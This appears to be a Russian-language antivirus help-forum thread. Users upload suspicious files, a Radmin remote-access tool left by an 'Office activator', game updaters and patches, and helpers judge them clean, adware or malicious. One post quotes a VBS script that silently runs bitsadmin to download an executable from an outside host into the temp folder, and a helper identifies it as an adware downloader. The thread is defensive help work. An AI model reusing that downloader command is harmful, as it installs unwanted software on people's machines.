-
C:\Program Files (x86)\Opera\launcher.exe - чистый.
C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe - чистый
C:\Program Files\WindowsApps\Microsoft.SkypeApp_3.1.0.1007_x8 6__kzf8qxf38zg5c\LibWrap.dll - чистый
C:\windows\SYSTEM32\sysfiles\msimg32.dll - чистый
C:\windows\SYSTEM32\sysfiles\oledlg.dll - чистый
C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe - not-a-virus:RemoteAdmin.Win32.Agent.lq (от программы удаленного доступа Radmin)
...
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Junior Member
- Вес репутации
- 33
Сообщение от
mike 1
...
Вот эти файлы C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe появились после установки "активатора офиса"
Просто удалить наверное мало?
-
Сообщение от
Userik
Вот эти файлы C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe появились после установки "активатора офиса"
значит, кто-то теперь имеет удалённый доступ к вашей системе.
Сообщение от
Userik
Просто удалить наверное мало?
http://virusinfo.info/showthread.php?t=1235
-
-
Junior Member
- Вес репутации
- 39
Файл сохранён как 150515_211536_virus_555629b8178d2.zip
Размер файла 4537931
MD5 f7b9ebb092e4d1ed46a31530a955f434
-
Junior Member
- Вес репутации
- 33
Файл сохранён как 150519_064934_virusinfo_auto_MIR_555aa4beaec7d.zip
Размер файла 60675520
MD5 b01ce9069272ae9d1809775af4f36760
-
Userik, для файлов типа
Сообщение от
Userik
150519_064934_virusinfo_auto_MIR_555aa4beaec7d.zip
вот эта процедура http://virusinfo.info/content.php?r=290-virus-detector
там же вы сами можете увидеть отчёт по файлам. Файлы в архиве чистые.
-
-
Junior Member
- Вес репутации
- 33
Здравствуйте!
Полезная прожка 10-Strike Connection Monitor Pro, но:
213frcds.jpg
Ваш вердикт и советы, пожалуйста?
P.S. Да, да, крякнутая...
P.P.S. Ложное срабатывание ввиду особенностей работы этой программы?
-
Junior Member
- Вес репутации
- 32
Файл сохранён как 150809_224109_run_55c79ec58c0c5.zip
Размер файла 48498
MD5 550e5a49a13a21141443bcb6e05d9bfe
скажите пожалуйста, какой вред может нанести этот файл, и как этого избежать можно, при этом не удаляя сам файл? без него нельзя игру запустить
-
Ваш вердикт и советы, пожалуйста?
А вы файл загружали?
скажите пожалуйста, какой вред может нанести этот файл, и как этого избежать можно, при этом не удаляя сам файл? без него нельзя игру запустить
Это не вирус, но эта программа может выполнять скрытно другие файлы, например какой-нибудь батник.
-
-
Junior Member
- Вес репутации
- 32
Сообщение от
mike 1
А вы файл загружали?
Это не вирус, но эта программа может выполнять скрытно другие файлы, например какой-нибудь батник.
а как узнать о том, действует ли она скрытно или нет?
-
Сообщение от
cvsdfvgsd
а как узнать о том, действует ли она скрытно или нет?
Создайте свою тему с логами в разделе Помогите.
-
-
Junior Member
- Вес репутации
- 32
по идее, апдейтер для игры. скажите пожалуйста, есть ли там вирусы?
Файл сохранён как 150813_100928_virus_55cc349895dd9.zip
Размер файла 934131
MD5 a5ef5cfb560fe1a6ec14d4665a10d62a
-
Junior Member
- Вес репутации
- 63
Drweb нашёл файл C:/task.vbs
содержимое файла:
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high %TEMP%/Updater.exe",0, True)
Set WshShell = Nothing
Результаты проверки: https://www.virustotal.com/ru/file/d...is/1440875485/
Это вирус?
-
Сообщение от
MihailKrasnodar
Drweb нашёл файл C:/task.vbs
содержимое файла:
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high //cds.d5v5w7m8.hwcdn.net/run/Updater.exe %TEMP%/Updater.exe",0, True)
Set WshShell = Nothing
Результаты проверки:
https://www.virustotal.com/ru/file/d...is/1440875485/
Это вирус?
Не, не вирус... Сей скрипт всего лишь загружает ту фигню, что в Вашем посте зовется апдейтер.экзе.
А вот уже сам апдейтер - это вот что: тык - потенциально нежелательная программа, предназначенная для показа рекламы в браузерах, отображения модифицированных страниц, открытия доп. вкладок и т.п.
Поищите в папках для временных файлов этот апдейтер. Может уже загрузился...
P.S. Будьте добры, потрите ссылку на updater в тексте. Вдруг кто тыкнет случайно
-
Junior Member
- Вес репутации
- 57
Файл сохранён как 151009_183645_JLRPatch_EN_5617d0fdd6bbc.zip
Размер файла 2770339
MD5 ea281b8b6495fcfc666465ba1f241cd2
-
Junior Member
- Вес репутации
- 57
-
Сообщение от
Adanedhel
Файл сохранён как 151009_183645_JLRPatch_EN_5617d0fdd6bbc.zip
Размер файла 2770339
MD5 ea281b8b6495fcfc666465ba1f241cd2
Зловред.
-
-
Junior Member
- Вес репутации
- 50
Файл сохранён как 151016_175501_virus_562101b56a283.zip
Размер файла 820669
MD5 06f1015d556beea817dce0fb636f9e7c
-
Сообщение от
xuim
Файл сохранён как 151016_175501_virus_562101b56a283.zip
Размер файла 820669
MD5 06f1015d556beea817dce0fb636f9e7c
Заражен. Рекламное ПО.
-
-
Junior Member
- Вес репутации
- 57
Файл сохранён как 151024_225557_virus_562bd43db5a7a.zip
Размер файла 731023
MD5 3faf4b6da9ab726661654266b09620f2